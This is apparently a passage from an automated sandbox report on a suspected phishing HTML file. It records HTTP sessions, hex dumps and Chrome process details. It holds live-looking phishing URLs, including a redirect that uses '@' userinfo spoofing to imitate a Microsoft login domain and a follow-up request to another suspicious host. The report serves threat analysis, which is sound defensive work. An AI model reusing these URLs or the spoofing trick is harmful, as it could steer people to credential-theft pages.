                        Date: Thu, 10 Apr 2025 17:22:29 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 198
                        Connection: close
                        X-Powered-By: Express
                        X-RateLimit-Limit: 2e+31
                        X-RateLimit-Remaining: 2e+31
                        X-RateLimit-Reset: 1744306571
                        Location: https://da48b13627.vk.com@microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ
                        Vary: Accept
                        2025-04-10 17:22:29 UTC198INData Raw: 3c 70 3e 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 64 61 34 38 62 31 33 36 32 37 2e 76 6b 2e 63 6f 6d 40 6d 69 63 72 6f 73 6f 66 74 6f 6e 65 6c 69 6e 65 64 61 34 38 62 31 33 36 32 37 2e 63 6f 6d 65 74 6c 6f 67 69 73 74 69 63 73 2e 63 6f 2e 75 6b 2f 3f 5f 64 61 34 38 62 31 33 36 32 37 3d 62 6e 42 6b 4c 32 6c 6b 5a 6e 56 76 5a 6d 56 74 63 47 68 75 59 6d 6c 69 63 32 68 42 61 48 4e 6d 59 33 5a 7a 59 69 52 70 63 54 42 6d 5a 53 39 6d 62 57 70 6e 5a 57 5a 7a 59 6d 6c 30 5a 57 4a 77 62 57 39 34 63 47 55 77 4d 44 74 30 63 58 56 31 61 51 3c 2f 70 3e
                        Data Ascii: <p>Found. Redirecting to https://da48b13627.vk.com@microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ</p>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.649736167.172.166.2264436120C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:22:29 UTC830OUTGET /?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ HTTP/1.1
                        Host: microsoftonelineda48b13627.cometlogistics.co.uk
                        Connection: keep-alive
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        If-None-Match: W/"15f-3M0a/pOvegNm6djT5a7IX2bYDBE"
                        2025-04-10 17:22:30 UTC269INHTTP/1.1 304 Not Modified
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 10 Apr 2025 17:22:30 GMT
                        Connection: close
                        X-Powered-By: Express
                        X-RateLimit-Limit: 2e+31
                        X-RateLimit-Remaining: 2e+31
                        X-RateLimit-Reset: 1744306571
                        ETag: W/"15f-3M0a/pOvegNm6djT5a7IX2bYDBE"


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.649738104.21.7.1204436120C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:22:31 UTC1122OUTGET /ph HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Referer: https://microsoftonelineda48b13627.cometlogistics.co.uk/
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY; zxP82kLZsbWiLJLakYRBhe_cRio=1744305670; m6LzT-_QW3fcpiodiHY68RdARWU=1744392070; QCa_rcD73k-ReIxngrj7ch1bedM=QBlweyg-Tsaz5eRtnAFwxEAO3qI
                        2025-04-10 17:22:31 UTC396INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Apr 2025 17:22:31 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        Cf-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 92e3ed42cac47ced-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-04-10 17:22:31 UTC327INData Raw: 31 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                        Data Ascii: 140<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                        2025-04-10 17:22:31 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:1
                        Start time:13:20:58
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true
                        Show Windows behavior

                        File Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        Show Windows behavior

                        COM Activities

                        Show Windows behavior

                        Process Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        Show Windows behavior

                        Memory Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        Show Windows behavior

                        Process Token Activities


                        General

                        Target ID:3
                        Start time:13:21:01
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2332,i,1114976431534499065,153738974873917783,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true
                        Show Windows behavior

                        File Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        Show Windows behavior

                        Memory Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                        General

                        Target ID:12
                        Start time:13:21:07
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html"
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                        General

                        Target ID:16
                        Start time:13:22:19
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false
                        Show Windows behavior

                        File Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        Show Windows behavior

                        COM Activities

                        Show Windows behavior

                        Process Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        Show Windows behavior

                        Memory Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        Show Windows behavior

                        Process Token Activities


                        General

                        Target ID:17
                        Start time:13:22:19
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --metrics-shmem-handle=1948,i,2868179512277568459,14568565378952564348,524288 --field-trial-handle=2028,i,3787505417702600662,9503551255279435640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2072 /prefetch:3
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false
                        Show Windows behavior

                        File Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        Show Windows behavior

                        Memory Activities

                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                        General

                        Target ID:18
                        Start time:13:22:27
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Downloads\8ff754f5-7513-4298-9573-17aa31ff5b5c.html"
                        Imagebase:0x7ff631b40000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                        Disassembly

                        No disassembly